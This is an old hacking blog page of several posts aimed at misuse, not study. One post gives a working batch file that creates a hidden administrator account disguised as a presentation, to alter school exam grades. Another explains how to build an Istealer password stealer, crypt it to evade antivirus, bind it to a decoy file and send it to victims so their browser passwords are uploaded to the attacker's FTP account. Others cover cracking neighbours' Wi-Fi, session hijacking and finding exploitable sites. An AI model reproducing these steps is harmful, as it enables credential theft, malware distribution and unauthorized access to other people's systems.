Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Thursday 15 August 2013

How to Find Vulnerable Websites without Using Dorks

How to Find Vulnerable Websites without Using Dorks

This Sh0rt Guide wiLL Wh0w y0u h0w t0 Find VulnerabLe Websites with0ut Using Dorks

First 0f aLL Take A Visit 2 Da F0ll0wiNG 

Website http://punkspider.hyperiongray.com/
[Image: new.jpg]
        
Check da b0x 4 de Vulnerability That U Want to search 4. IF U
want to check for SQLi then tick the box 4 SQLi nd Press da Spider
butt0n.

The nExt PaGe will sh0w U aLL oF de vulnerable Websites With De Keyw0rD UseD bEforE. UnDernEatH it wiLL Sh0w WhaT De VulnerabilitiezZz R. SiMplY CLick 0n "sh0w DetailzZz".

AFtEr ClickinG da "Show DetailzZz" Link, it wiLL ShOw De VulneraBLe URLzZ Which Can Then be ExPL0ited.

All credits 2 Master Zombiee :D



Wednesday 7 August 2013

Best 5 hacking apps for android

Best 5 hacking apps for android




Today I am gonna tell you about the top 5 android app for hacking. As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps. Must try all these apps....

The Android Network Toolkit


In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.




---------------------------------------------------------------------------------------

Nmap for Android


Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good


-----------------------------------------------------------------------------------------FaceNiff 2.4 final- Session Hijacker for Android


Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitterFaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS.

-------------------------------------------------------------------------------------------

AnDOSid- DOS Tool for Android

AnDOSid- DOS Tool for Android

DOS or denial of service attack is very dangerous attack because it takes down the server 
(computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!
------------------------------------------------------------------------------------------

SSHDroid- Android Secure Shell 


SSHDroid
- Android Secure Shell 

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").



Sunday 14 April 2013

HOW TO GET ADMIN STATUS AT YOUR SCHOOL


Tutorial: How to get an admin status at your school
(Scroll Down To Bottom For How To Get Into CMD At School)
Why to do something like this?
You can for example look up the exam files and change your note or you even can get access to your schools website.
Let's start
For Example you have to prepare a presentation as homework. So we will connect a batch file (with the code to get admin) and .odp file OpenOffice presentation)
Batch file for the admin and also opening the presentation file
You will need your presentation file now. I will call it presentation.odp.
You just have to open the editor and type the code.





Code:
================================================================
@echo off
net user <username> <password> /add
net localgroup administrators <username> /add
start presentation.odp
exit
================================================================
For <username> just type a name you want for you admin account and for <password> the password for the login process
.
Save this file as presentation.bat
.
In different countries the localgroup administrators can be different. To check it just type "net localgroup" and you will find something that will stand for admins in your country.

Code explanation
@echo off - won't print all the following commands
net user <username> <password> /add - creates a new user
net localgroup administrators <username> /add - gives the admin status to the created account
start presentation.odp opens the presentation with the default program for the .odp extension
exit - closes the cmd immediately after ending the last command
Changing the icon of the .odp file
Download the icon for .odp file (just google it).
Download a .bat to .exe converter and use the icon.
Save the .exe file as presentation.exe

Last step
                     Hide all the other files, except the launcher. The only important thing is that you have to launch                      This program from an admin computer under windows. It won't work for mac computers.
                      I will take no responsibility for launchin it in your school. It is illegal without the permissions!


HOW TO GET INTO CMD AT YOUR SCHOOL
(1) download opera
(2) run it
(3) right click on it and press source
(4) select all and delet
(5) then type command.exe
(6) save as command.bat on the desktop
(7) double click on the bat file and then you got command

If this does not work try using this method.

Open notepad
type:
@echo off
command
@echo on
save as mycmd.bat instead of mycmd.txt.

NOTE:
             you should change from .bat to .txt when not using the cmd
Enjoy everybody
This Does Not Work For All Schools! Enjoy

JOIN MY SITE FOR LATEST HACKS AND UPDATES

Tuesday 1 January 2013

Hack Email, Facebook and Myspace Passwords Using Istealers



Hack Email, Facebook and Myspace Passwords Using Istealers



What are Stealer's ?
II Iit is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's  look like keyloggers but there are many differences, Stealer's steal only  passwords that stored in the web browsers they wont capture keystrokes typed by the user
Advantages of  Stealer's 
Its very easy to use, Its very small in size and thus Very easy to bypass antivirus detection by using some of the techniques mentioned below
Disadvantages 
It steals passwords that are only stored in the browsers and chat apps ,  This hack wont work if victim has not saved his passwords in his web browser , It has very few features Unlike a keylogger which has many features like live monitoring,  chat logs etc , Its not that stable as keyloggers

Hack Email, Facebook and Myspace Passwords Using Istealer

Things We Need :- 

1. Istealer - To Steal victims stored passwords ,You can download Istealer from here
2. Ftp Account - Create a free ftp account from www.drivehq.com
3. Crypter - To Bypass Antivirus detection You can download free FUD Crypter from here and the password is @hackholic

Note:- If you get an error saying COMDLG32.OCX  missing , Then Please download the missing OCX  from  Here
Procedure :-


1. First Download the Istealer Software from the link given above, extract the files using  winrar 
Note :- Your anti virus will start screaming saying its a virus , But its not a virus ,So please turn off your AV(antivirus) software's before extracting the files   

2.  After extracting the files open Istealer.exe ,  Enter Host as "ftp.drivehq.com" without quotes ,Then enter your FTP accounts details (login name and password ) which you created earlier, check all options on the right hand side as shown

4. Now check "bind with another file " and select the file which you want to bind with the Istealer ,Then hit "change the icon " and change the icon as you wish, i have also include an  icon pack you can also use those icons. Finally select build and save the out put file 


Now we have successfully created our server file but it is detected by Av's as virus, so we have to Crypt our server file, so as to bypass antivirus detection , To do that follow the steps given below 

1. Download the Free FUD- Crypter software from the link given above , 


2. Open the crypter Software , Select server file as the Istealer file you created ( file created in step 4) ,finally click crypt
Now your istealer is totally  undetectable,
Now simply send this file to your victim, when the victim opens it  he will only see the file or app which you binded in step 4,
 Mean while your istealer will install silently in the background, After which  it will send  logs (containing stored passwords form the victims browser)  to your ftp account, You can view your victims passwords by logging  into your ftp account ,By this way we are able to successfully  hack our victims Email, Facebook ,Myspace Passwords 
 




SORRY LINKS ARE DOWN 


Saturday 10 November 2012

Hack Any Password Protected Wi-Fi Network and use Free Internet



First you have to know what is Wi-Fi and how dose it work?
"Wi-Fi" is a type of wireless networking protocol that allows devices to communicate without cords or cables.


1: Wi-fi uses antennas around which wi-fi "hotspots" are created. The hotspots are outlets equipped to receive the radio waves that power wireless networking. Until recently, wi-fi has been confined to more than 10,000 hot-spots in cafes, bars and airport lounges. But various projects are under way to set up city-wide zones, where a series of antennas are installed in the streets, on lampposts or street signs. The hotspots around them together create a much wider area of coverage. Norwich has a mesh network which links each lamppost antenna to the next creating a seamless wi-fi hotspot around the center of the city.
2: The source internet connection is provided by a PC or server to which the antennas are connected either wirelessly or via a cable.
3: Some mobile phones and personal digital assistants (PDA) now have wi-fi chips installed. With mobile phones, this means conventional networks can be bypassed and inexpensive long-distance calls made over the web (using Voice over Internet Protocol, VoIP).
4: Many laptops and handheld computers now come with built-in wi-fi connectivity; it is also possible to add wi-fi to your computer with a special card that plugs into a port on your laptop.
Some organizations provide it for free but maximums provide it for business purpose only. And you have to give a password to access this kind of network.
This software price is $1099. Don't worry, I'm giving you for FREE.
Download This Software from here
Note: Please turn off your anti-virus program before you install this software, otherwise this software will not work properly. After completing installing process you can re-run your anti-virus program.
Now follow the Instructions bellow:
1. Install the software and drivers.
2. Click on ‘Rules’ tab and tick on ‘Enable advance rules’ option.















3. Type ‘a’ on Name box and Past this code on formula box “tods=1 and dmac=FF:FF:FF:FF:FF:FF” like picture bellow. Then click ‘add/edit’ button.













4. A window will appear like the picture bellow. Give a tick on ‘a’ .














5. Then go to ‘Settings’ and click ‘Option’













6. Go to ‘Memory Usage’ tab and set everything just like this picture & click ‘Ok’ (Restart may be required).














7.  Check ‘D’ funnel and uncheck another two funnel from the right top of this window.














8. Click ‘Search’ button and find the network that you want to creak.














9. Then drag it on ‘Channel’ tab and click ‘Capture’ button.













10. Now which one is do not capturing anything give it to password protected network and connect it. When it will ask for password, give any as you wish.
11. It will show this massage “Connected with limited connectivity”.
(I have no Wi-Fi connections at this time. that is why, I can’t share some screenshots).
12. Click on main menu again and then click on ‘Packets’ Tab. If everything was all right, you will see some Couple of Packets.












13. Click right button on “ARP REQ”  Packet and then > “Send Packet(s)” > Selected.


























14. This menu will appear.














15. Now change all values just like this and click ‘Send’.














16. Go to ‘Rules’ Tab again and uncheck the Rules “a” .














17.  Select first 20000 packets and save it. Make sure you are saving it as “dump cap” file in place of “ncf” file format. (I have no Wi-Fi connections this time, that is why I can’t share some screenshots).














18. Now download a zip folder named “Aircrack-NG” from HERE. And extract it.

19. Open ‘bin’ folder and run this file ‘aircrack-ng-GUI.exe’. Then go where you saved the packets, select all and click launch.

20. An ‘IV’ list will came. Select the network that you want to creak.

21. Click ‘Connect’. You will be connected with your desire network like a magic !

22. Enjoy the Unlimited Wi-Fi Internet.

Also you can do with this software :













now we are done 
follow my site for latest posts